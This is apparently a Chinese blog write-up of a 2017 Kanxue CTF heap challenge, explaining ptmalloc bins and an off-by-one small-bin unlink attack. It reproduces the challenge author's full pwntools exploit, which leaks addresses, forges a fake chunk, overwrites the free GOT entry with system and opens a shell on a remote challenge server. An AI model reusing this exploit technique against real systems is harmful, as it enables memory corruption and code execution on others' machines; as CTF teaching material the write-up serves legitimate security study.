2017看雪秋季CTF--第四题思路二

Heap Overflow之off-by-one

看雪CTF第四题,writemessage由于写入次数比buffer多了一字节,所以可以用off-by-one

基础:目前的Linux使用的是基于ptmalloc的堆管理器,在ptmalloc中堆块被分为以下四种类型

  1. fastbin
    fastbin的范围处于16~64byte,使用单向链表来维护。每次从fastbin中分配堆块时,都会从尾部取出。fastbin块的inuse位永远是置于1的,并且享有最高的优先权,在分配和释放时总会最先考虑fastbin。
  2. unsort bin
    unsort bin在bins[]中仅占有一个位置,除了fastbin外的其他块被释放后都会进入到这里来作为一个缓冲,每当进行malloc时会把堆块从unsort bin中取出并放到对于的bins[]中。
  3. small bin
    small bin是指大于16byte且小于512byte的堆块,使用双向链表链接,不会有两个相邻的空的small bin块,因为一旦出现这种情况,相邻的块就会被合并成一个块。通常是在调用free函数时触发这一过程。需要注意的是在相邻空块合并时会调用unlink()宏来进行取下操作,但是调用malloc()时的取下操作却没有使用unlink宏。
  4. large bin
    超出large bin范围的即为large bin,large bin相比其他块而言具有一条额外的由fd_nextsize和bk_nextsize域组成的链表结构

其中size域低三位作为标志位,我们最需要记住的就是inuse位,这个位确定了前一个块是否处于使用状态。在ptmalloc中一个块是否使用是由下一个块进行记录的

off-by-one分类:

  • chunk overlapping

off-by-one overwrite allocated

off-by-one overwrite freed

off-by-one null byte

  • unlink

off-by-one small bin

off-by-one large bin

第一种的利用的核心思路主要是为了进行chunk overlapping,而第二种的利用思路则是想要触发unlink。

参考了本题作者的出题思路,利用的是:off-by-one small bin
这种方法是要触发unlink宏,因此需要一个指向堆上的指针来绕过fd和bk链表的check。

需要在A块上构造一个伪堆结构,然后覆盖B的pre_size域和inuse域。这样当我们free B时,就会触发unlink宏导致指向堆上的指针ptr的值被改成&ptr-0xC(x64下为&ptr-0x18)。通过这个特点,我们可以覆写ptr指针,如果条件允许的话,几乎可以造成无限次的write-anything-anywhere。

结构:

A B
  1. A块中构造伪small bin结构,覆盖B块的prev_size域和inuse域

  2. free B块

  3. ptr指针被改为&ptr-0xC

作者提供的wp:

from pwn import *

bin_file = "./club"
remote_detail = ("123.206.22.95",8888)
libc_file = "./libc.so.6"
bp = [0x1100]
pie = True
p,elf,libc = init_pwn(bin_file,remote_detail,libc_file,bp,pie)

def new(box,size=0):
    p.recvuntil("> ")
    p.sendline("1")
    p.recvuntil("> ")
    p.sendline(str(box))
    p.recvuntil("> ")
    p.sendline(str(size))

def free(box):
    p.recvuntil("> ")
    p.sendline("2")
    p.recvuntil("> ")
    p.sendline(str(box))

def msg(box,cont):
    p.recvuntil("> ")
    p.sendline("3")
    p.recvuntil("> ")
    p.sendline(str(box))
    p.send(cont)

def show(box):
    p.recvuntil("> ")
    p.sendline("4")
    p.recvuntil("> ")
    p.sendline(str(box))
    return p.recvuntil("\n").strip()

def guess_num(num):
    p.recvuntil("> ")
    p.sendline("5")
    p.recvuntil("> ")
    p.sendline(str(num))
    ret = p.recvuntil("\n")
    ok = "G00d" in ret
    number = int(ret.split(" ")[-1].split("!")[0])
    return ok,number

def guess():
    randnum = []
    for i in xrange(31):
        ok,num = guess_num(0)
        randnum.append(num)
    while not ok:
        guess = (randnum[len(randnum)-31]+randnum[len(randnum)-3])&0x7fffffff
        ok,num = guess_num(guess)
        randnum.append(num)
    return num

def df_chunk(addr,size):
    # addr is the heap_addr, that means *addr=(&fake_chunk)
    fake_chunk = p64(0) + p64(size+1) + p64(addr - 0x18 ) + p64(addr - 0x10) + (size-0x20) * 'M'
    fake_next_size = p64(size)
    return fake_chunk + fake_next_size
    //p64(0x0)+p64(0xsize)表示前一个chunk在使用中,当前chunk尺寸为size,p64(X-0x18)+p64(X-0x10)表示chunk4的fd和bk指向地址,后面M是数据填充,并且在下一块标记前一块(即2)未使用,大小为size
    
    
if __name__ == "__main__":
    #guess number to get stack_addr
    seed_addr = guess()
    heap_addr = seed_addr - 0x48 + 0x10
    base_addr = seed_addr - 0x148-0x202000
    free_got = elf.got['free'] + base_addr
    atoi_got = elf.got['atoi'] + base_addr   //字符串转换成整型数的一个函数
    puts_got = elf.got['puts'] + base_addr
    libc_free = libc.symbols['free']
    libc_system = libc.symbols['system']
    log.success("heap_addr:" + hex(heap_addr))
    new(1, 0x18)
    new(2, 0xe8)
    new(3, 0xf8)
    new(4,0x110)
    msg(4,"/bin/sh\x00\n")
    
    payload = df_chunk(heap_addr,0xe0) + "\x00"

    msg(2,payload)   //构造 small bin并写入  (即A块)
    free(3)          //free后一个块完成   (即B)
    msg(2,'1'*0x10 + p64(puts_got) + p64(free_got)+"\n")   //再执行(2)就可以修改hp[]中的部分内容
    free_addr = show(2)
    free_addr = free_addr.strip().ljust(8,"\x00")
    free_addr = u64(free_addr)
    base_addr = free_addr - libc_free
    system_addr = base_addr + libc_system
    log.success("system_addr: %s"%(hex(system_addr)))
    msg(1,p64(system_addr)+"\n")
    p.recvuntil("> ")
    p.sendline("4")
    p.recvuntil("> ")
    p.sendline("4")
    #show(4)
    p.interactive()
    
最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 213,014评论 6 492
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 90,796评论 3 386
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 158,484评论 0 348
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 56,830评论 1 285
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 65,946评论 6 386
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 50,114评论 1 292
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,182评论 3 412
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 37,927评论 0 268
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,369评论 1 303
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 36,678评论 2 327
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 38,832评论 1 341
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 34,533评论 4 335
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,166评论 3 317
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 30,885评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,128评论 1 267
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 46,659评论 2 362
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 43,738评论 2 351

推荐阅读更多精彩内容

  • 题目介绍: 打开,题目有6个功能,进ida详细查看 可以看出,这个功能号就是用来申请一个堆空间,不过这里有限制,先...
    SueLyon阅读 503评论 0 1
  • 每个人都有自己不同的爱好,因为每个人都是与众不同的唯一,如何让孩子对他不喜欢的运动感兴趣,这需要老师对孩子的耐心和...
    e1a95257f1fb阅读 177评论 0 0
  • 很多没有接触过潜水的人都觉得潜水是一项非常危险的活动,其实相对于其他普及的体育运动(羽毛球、乒乓球等)来讲,危险性...
    Moi宣潜水阅读 1,188评论 0 1
  • 话不多说,先看效果: 这是我前几天在项目空档期,仿的小红书,它的主页就是典型的瀑布流。下面咱们就分析一下: 思路:...
    M_慕宸阅读 3,723评论 1 30
  • 有没有哪一瞬间,你亲历了一场大火,改变了对自己身份的认知? 记得离开学校时,我认为自己无所不能,所以切断了后路,想...
    是雨彤呀阅读 120评论 0 1